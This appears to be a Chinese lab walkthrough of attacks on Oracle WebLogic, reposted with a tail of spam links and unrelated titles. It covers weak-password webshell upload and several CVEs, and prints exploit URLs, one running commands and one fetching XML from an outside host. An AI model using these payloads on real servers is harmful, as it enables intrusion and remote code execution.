当前位置: 首页 > wzjs >正文

网站访问人数代码网站建设前期规划方案

网站访问人数代码,网站建设前期规划方案,wordpress设置ip,单片机做网站一、后台弱口令GetShell 1、开环境 2、访问目录 console/login/LoginForm.jsp 3、登录后台 通过弱口令登录后台 weblogic/Oracle123 4、上传war包 部署-安装-上载文件 上传一个war包,然后一直下一步 去访问我们的木马文件 5、测试连接 二、CVE-2017-3506 1、…

一、后台弱口令GetShell

1、开环境

2、访问目录

console/login/LoginForm.jsp

3、登录后台

通过弱口令登录后台

weblogic/Oracle@123

4、上传war包

部署-安装-上载文件

上传一个war包,然后一直下一步

去访问我们的木马文件

5、测试连接

二、CVE-2017-3506

1、开环境

环境就是上一个的环境不用变,访问目录即可

/wls-wsat/CoordinatorPortType

2、在当前页抓包,添加请求包

改为POST传参,文件类型改为text/xml,添加请求包

3、在服务器开启监听

把修改好的包发送出去

4、监听成功

三、CVE-2019-2725

1、开环境

还是上一个的环境,需要访问目录

_async/AsyncResponseService

2、在当前页抓包,添加请求包

改为POST传参,修改文件类型为text/xml,添加请求包

请求包中的150.158.199.164/1.txt代表着把我们网站的根目录下的1.txt上传到他的电脑上,并重命名为wjf.jsp

3、在我们网站的根目录上传一个1.txt文件,里面放的是哥斯拉生成的木马

4、发送数据包

5、访问我们上传的wjf.jsp文件

/bea_wls_internal/wjf.jsp

6、测试连接

四、CVE-2018-2628

1、开环境

2、利用工具

输入网址,检查

存在漏洞之后执行命令

五、CVE-2018-2894

1、开环境

访问路径/console/login/LoginForm.jsp

2、获取密码

docker-compose logs | grep password

3、登录

4、设置服务开启

域结构——base-domain——高级——启动WEB服务测试页——保存

5、进入config.do 文件进行设置

/ws_utc/config.do

修改目录,保存

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

6、安全,添加文件

7、访问目录

150.158.199.164:7001/ws_utc/config/keystore/1742717964975_1.jsp

f12,点左边的小箭头,再点上面的1,就可以显示出来id

访问地址

/ws_utc/css/config/keystore/1742717964975_1.jsp

8、得知文件已经上传,测试连接

六、CVE-2020-14882

1、开环境

2、访问目录

需要使用一下URL绕过

/​​​​​​console/css/%252e%252e%252fconsole.portal

3、在云服务器上执行命令,进入容器

docker exec -it 容器id /bin/bash

进来之后输入URL

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

执行命令ls /tmp

可以看到success已经在里面了

还有一种方法

在我们的服务器新建一个xml文件

监听端口6666

访问文件,监听端口

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://150.158.199.164:7001/2.xml")


文章转载自:

http://jTkRIk10.jwncx.cn
http://3Sslepnu.jwncx.cn
http://Icw6QT0D.jwncx.cn
http://XHTRBfa3.jwncx.cn
http://osrcpWyk.jwncx.cn
http://kpqzdpYn.jwncx.cn
http://zsWSiJiB.jwncx.cn
http://GRWBGC09.jwncx.cn
http://Tj75Payb.jwncx.cn
http://nLTYiUfw.jwncx.cn
http://zRCtrUzp.jwncx.cn
http://tDH4Df98.jwncx.cn
http://tk4i9kqT.jwncx.cn
http://NpvppA2T.jwncx.cn
http://Mjt6MlTJ.jwncx.cn
http://4RoxhDps.jwncx.cn
http://bva1UTjm.jwncx.cn
http://fqlATZmJ.jwncx.cn
http://wK8y5rpl.jwncx.cn
http://2TZNiBFB.jwncx.cn
http://WFEQe3Ay.jwncx.cn
http://tArB8Cov.jwncx.cn
http://ucjouAt8.jwncx.cn
http://21jEQPAT.jwncx.cn
http://dihgIuVt.jwncx.cn
http://4Pw1xcde.jwncx.cn
http://fkEKQfSH.jwncx.cn
http://R2n8kN0B.jwncx.cn
http://8x1OC0CY.jwncx.cn
http://u3J7iwVS.jwncx.cn
http://www.dtcms.com/wzjs/774229.html

相关文章:

  • 用什么软件做网站布局实用的wordpress插件
  • 如何为网站做推广乐陵网站开发
  • 做手机网站要多少钱软件销售
  • asp 英文企业网站 免费教学app制作
  • 绿色在线网站模板下载工具西安 网站开发 招聘
  • 如何做网站收录客户关系管理系统的特点
  • 网站维护与建设实训心得公司网站没备案
  • 深圳做营销网站公司哪家好西安网站优化指导
  • 百度数据网站沈阳最新通知今天重要消息
  • icon图标素材下载网站网站建设pdf
  • 网站改版方案案例站长工具关键词挖掘
  • 哪个网站做视频挣钱影视会员网站怎么建设
  • wx5 做网站可以么刚建设的网站多久能在百度查到
  • 做网站所需要的资质wordpress页面自定义
  • php做网站流程网站的外链建设
  • wordpress网站佣金推广双公示网站专栏建设情况
  • 网页在线生成做网站优化有什么途径
  • vscode的网站开发配置装饰设计资质等级标准
  • 深圳网站开发深圳网站设计建站宝盒后台
  • 温州网站建设访问wordpress的xmlrpc.php
  • 商务网站开发实验报告下载建网站
  • 购物网站建设行业现状广东网站建设方便
  • 门户类网站建设电子邮箱免费注册
  • 泰州网站建设要多少钱目前网站开发趋势
  • 广东微信网站制作公司做网站 信息集成过程的顺序
  • 创建网站的六个步骤 天堂最新版在线资源
  • 给别人做网站的话术网站怎么做的qq邮件订阅
  • 网站展示济南网站制作搜到
  • 广州市律师网站建设怎么样百度手机助手应用商店
  • 高密 网站建设西安网站开发技术